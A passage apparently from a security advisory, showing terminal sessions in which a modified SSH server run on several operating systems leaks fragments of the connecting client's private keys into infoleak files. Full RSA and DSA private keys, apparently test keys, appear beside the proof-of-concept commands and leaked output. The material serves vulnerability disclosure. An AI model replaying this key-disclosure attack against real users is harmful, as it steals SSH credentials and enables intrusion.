QsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n\nUxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7\nqsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11\n1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV\npmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:1280\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-97ed9f59/infoleak\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:768\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-9448bb7f/infoleak\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\n... \n\n# env ROAMING=\"client_out_buf_size:1024\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-279f5e2b/infoleak\n... \niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n... \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:2048\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-35ee7ab0/infoleak\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-6cb31d82/infoleak\n... \nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n$ /usr/bin/ssh -V\nOpenSSH_7.0, LibreSSL 2.2.2\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL\nruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s\n17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8\nL/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh\nxSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP\nvavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl\nJka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP\nKyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19\nqJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY\ngQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK\nQolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt\ngKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL\ncQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB\n+s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl\nhcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri\nhBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh\nvhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O\nnFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG\n8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n-----END RSA PRIVATE KEY-----\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 1 %h %p\" -p 222 127.0.0.1\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n(this example requires a ProxyCommand because of the NULL-aitop bug\ndescribed in the Mitigating Factors of the Information Leak section, and\ncrashes because of the NULL-pointer dereference discussed in the\nMitigating Factors of the Buffer Overflow section)\n\n# cat /tmp/roaming-a5eca355/infoleak\nry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: CentOS 7, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"CentOS Linux 7 (Core)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n\nGLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2\nhUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-b7b16dfc/infoleak\njJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5\n\n# strings /tmp/roaming-b324ce87/infoleak\nIuQL\nR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9v\n\n# strings /tmp/roaming-24011739/infoleak\nKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC\n\n# strings /tmp/roaming-37456846/infoleak\nLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA\nyq4Kwj/\n\n# strings /tmp/roaming-988ff54c/infoleak\nGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\n\n# strings /tmp/roaming-53887fa5/infoleak\n/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: Fedora 20, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"Fedora 20 (Heisenbug)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz\nHLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp\no9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ\n/B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy\n2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr\nHiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\njwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm\nqK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\nZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-a2bbc5f6/infoleak\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG\n\n# strings /tmp/roaming-47b46456/infoleak\nRGAcE0nc\nGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9\n\n# strings /tmp/roaming-7a6717ae/infoleak\ncawMW4LZ1\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p\n\n# strings /tmp/roaming-f3091f08/infoleak\nlZ3w0qHe\nnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\n\n# strings /tmp/roaming-62a9e9a3/infoleak\nlZ3w0qHe\nr3TwTa0pPEk11\nLbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37P\n\n# strings /tmp/roaming-8de31ed5/infoleak\n7qyvNznQ\n26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\n\n# strings /tmp/roaming-f5e0fbcc/infoleak\nyESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxS\n\n# strings /tmp/roaming-9be933df/infoleak\nQRtzK/GpRuMC1\nC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT\n\n# strings /tmp/roaming-ee4d1e6c/infoleak\nSG3aTqYp\ntEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s\n\n# strings 